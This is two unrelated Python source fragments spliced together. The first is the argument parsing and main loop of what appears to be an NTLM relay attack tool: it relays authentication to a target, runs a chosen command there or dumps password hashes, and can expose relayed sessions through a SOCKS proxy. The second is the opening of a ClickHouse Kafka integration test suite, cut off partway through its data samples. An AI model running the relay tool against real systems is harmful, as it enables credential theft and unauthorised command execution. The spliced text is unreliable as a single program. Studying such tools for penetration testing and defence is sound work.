parser.add_argument('-c', action='store', type=str, required=False, metavar='COMMAND',
help='Command to execute on target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-one-shot', action='store_true', default=False,
help='After successful authentication, only execute the attack once for each target')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/2.4/lib/standard-encodings.html and then execute wmiexec.py '
'again with -codec and the corresponding codec ' % CODEC)
parser.add_argument('-outputfile', action='store',
help='base output filename for encrypted hashes. Suffixes will be added for ntlm and ntlmv2')
parser.add_argument('-machine-account', action='store', required=False,
help='Domain machine account to use when interacting with the domain to grab a session key for '
'signing, format is domain/machine_name')
parser.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH",
help='Domain machine hashes, format is LMHASH:NTHASH')
parser.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
try:
options = parser.parse_args()
except Exception, e:
logging.error(str(e))
sys.exit(1)
if options.codec is not None:
CODEC = options.codec
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
if options.h is not None:
logging.info("Running in relay mode")
mode = 'RELAY'
targetSystem = options.h
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
exeFile = options.e
Command = options.c
returnStatus = options.s
threads = set()
if options.socks is True:
# Start a SOCKS proxy in the background
s1 = SOCKS()
socks_thread = Thread(target=s1.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
for server in RELAY_SERVERS:
s = server(options.outputfile)
s.setTargets(targetSystem)
s.setExeFile(exeFile)
s.setCommand(Command)
s.setSocks(options.socks)
s.setReturnStatus(returnStatus)
s.setMode(mode, options.one_shot)
if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None:
s.setDomainAccount( options.machine_account, options.machine_hashes, options.domain)
elif (options.machine_account is None and options.machine_hashes is None and options.domain is None) is False:
logging.error("You must specify machine-account/hashes/domain all together!")
sys.exit(1)
s.start()
threads.add(s)
print ""
logging.info("Servers started, waiting for connections")
while True:
try:
sys.stdin.read()
except KeyboardInterrupt:
logging.info('Quitting.. please wait')
if options.socks is True:
s1.shutdown()
for s in threads:
del(s)
sys.exit(1)
else:
pass
|
test.py
|
import json
import os.path as p
import random
import socket
import subprocess
import threading
import time
import avro.schema
from confluent_kafka.avro.cached_schema_registry_client import CachedSchemaRegistryClient
from confluent_kafka.avro.serializer.message_serializer import MessageSerializer
import kafka.errors
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.network import PartitionManager
from helpers.test_tools import TSV
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer, BrokerConnection
from kafka.admin import NewTopic
from kafka.protocol.admin import DescribeGroupsRequest_v1
from kafka.protocol.group import MemberAssignment
"""
protoc --version
libprotoc 3.0.0
# to create kafka_pb2.py
protoc --python_out=. kafka.proto
"""
from . import kafka_pb2
from . import social_pb2
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
main_configs=['configs/kafka.xml', 'configs/log_conf.xml', 'configs/kafka_macros.xml'],
with_kafka=True,
with_zookeeper=True,
clickhouse_path_dir='clickhouse_path')
kafka_id = ''
# Helpers
def check_kafka_is_available():
p = subprocess.Popen(('docker',
'exec',
'-i',
kafka_id,
'/usr/bin/kafka-broker-api-versions',
'--bootstrap-server',
'INSIDE://localhost:9092'),
stdout=subprocess.PIPE)
p.communicate()
return p.returncode == 0
def wait_kafka_is_available(max_retries=50):
retries = 0
while True:
if check_kafka_is_available():
break
else:
retries += 1
if retries > max_retries:
raise "Kafka is not available"
print("Waiting for Kafka to start up")
time.sleep(1)
def producer_serializer(x):
return x.encode() if isinstance(x, str) else x
def kafka_produce(topic, messages, timestamp=None):
producer = KafkaProducer(bootstrap_servers="localhost:9092", value_serializer=producer_serializer)
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
def kafka_consume(topic):
consumer = KafkaConsumer(bootstrap_servers="localhost:9092", auto_offset_reset="earliest")
consumer.subscribe(topics=(topic))
for toppar, messages in list(consumer.poll(5000).items()):
if toppar.topic == topic:
for message in messages:
yield message.value.decode()
consumer.unsubscribe()
consumer.close()
def kafka_produce_protobuf_messages(topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:9092", value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
print(("Produced {} messages for topic {}".format(num_messages, topic)))
def kafka_produce_protobuf_messages_no_delimeters(topic, start_index, num_messages):
data = ''
producer = KafkaProducer(bootstrap_servers="localhost:9092")
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
producer.send(topic=topic, value=serialized_msg)
producer.flush()
print("Produced {} messages for topic {}".format(num_messages, topic))
def kafka_produce_protobuf_social(topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = social_pb2.User()
msg.username='John Doe {}'.format(i)
msg.timestamp=1000000+i
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:9092", value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
print(("Produced {} messages for topic {}".format(num_messages, topic)))
def avro_confluent_message(schema_registry_client, value):
# type: (CachedSchemaRegistryClient, dict) -> str
serializer = MessageSerializer(schema_registry_client)
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
return serializer.encode_record_with_schema('test_subject', schema, value)
@pytest.mark.timeout(180)
def test_kafka_json_as_string(kafka_cluster):
kafka_produce('kafka_json_as_string', ['{"t": 123, "e": {"x": "woof"} }', '', '{"t": 124, "e": {"x": "test"} }',
'{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}'])
instance.query('''
CREATE TABLE test.kafka (field String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_json_as_string',
kafka_group_name = 'kafka_json_as_string',
kafka_format = 'JSONAsString',
kafka_flush_interval_ms=1000;
''')
result = instance.query('SELECT * FROM test.kafka;')
expected = '''\
{"t": 123, "e": {"x": "woof"} }
{"t": 124, "e": {"x": "test"} }
{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}
'''
assert TSV(result) == TSV(expected)
assert instance.contains_in_log(
"Parsing of message (topic: kafka_json_as_string, partition: 0, offset: 1) return no rows")
@pytest.mark.timeout(300)
def test_kafka_formats(kafka_cluster):
# data was dumped from clickhouse itself in a following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
],
'supports_empty_value': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
],
'supports_empty_value': True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# ''
# On empty message exception: Cannot parse input: expected '[' at end of stream., Stack trace (when copying this message, always include the lines below):
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/JSONCompactEachRowRowInputFormat.cpp:0: DB::JSONCompactEachRowRowInputFormat::readPrefix() @ 0x1dee6bd6 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# ''
# On empty message exception: Unexpected end of stream while reading key name from TSKV format
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:88: DB::readName(DB::ReadBuffer&, StringRef&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&) @ 0x1df8c098 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:114: DB::TSKVRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df8ae3e in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
],
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# '',
# On empty message exception happens: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:583: void DB::readCSVStringInto<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > >(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c961e1 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:678: DB::readCSVString(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c8dfae in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CSVRowInputFormat.cpp:170: DB::CSVRowInputFormat::readPrefix() @ 0x1dec46f7 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
],
'supports_empty_value': True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# '',
# On empty message exception happens: Cannot parse input: expected '\n' at end of stream.
# /src/IO/ReadHelpers.cpp:84: DB::throwAtAssertionFailed(char const*, DB::ReadBuffer&) @ 0x15c8d8ec in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:24: DB::skipTSVRow(DB::ReadBuffer&, unsigned long) @ 0x1df92fac in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:168: DB::TabSeparatedRowInputFormat::readPrefix() @ 0x1df92df0 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
# 'Template' : {
# 'data_sample' : [
# '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '' # tolerates
# ],
# 'extra_settings': ", format_template_row='template_row.format'"
# },
'Regexp': {
'data_sample': [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# ''
# On empty message exception happens: Line "" doesn't match the regexp.: (at row 1)
# /src/Processors/Formats/Impl/RegexpRowInputFormat.cpp:140: DB::RegexpRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df82fcb in /usr/bin/clickhouse
],
'extra_settings': ", format_regexp='\(id = (.+?), blockNo = (.+?), val1 = \"(.+?)\", val2 = (.+?), val3 = (.+?)\)', format_regexp_escaping_rule='Escaped'"
},
## BINARY FORMATS
# dumped with
# clickhouse-client ... | xxd -ps -c 200 | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# ''
# On empty message exception happens: DB::Exception: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/VarInt.h:135: void DB::readVarUIntImpl<false>(unsigned long&, DB::ReadBuffer&) @ 0x15c68bb7 in /usr/bin/clickhouse
# /src/IO/VarInt.h:149: DB::readVarUInt(unsigned long&, DB::ReadBuffer&) @ 0x15c68844 in /usr/bin/clickhouse
# /src/DataStreams/NativeBlockInputStream.cpp:124: DB::NativeBlockInputStream::readImpl() @ 0x1d3e2778 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/NativeFormat.cpp:42: DB::NativeInputFormatFromNativeBlockInputStream::generate() @ 0x1df1ea79 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'MsgPack': {
'data_sample': [
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x01\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x02\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x03\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x04\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x05\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x06\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x07\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x08\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x09\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0a\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0b\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0c\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0d\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0e\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0f\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
# ''
# On empty message exception happens: Unexpected end of file while parsing msgpack object.: (at row 1)
# coming from Processors/Formats/Impl/MsgPackRowInputFormat.cpp:170
],
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
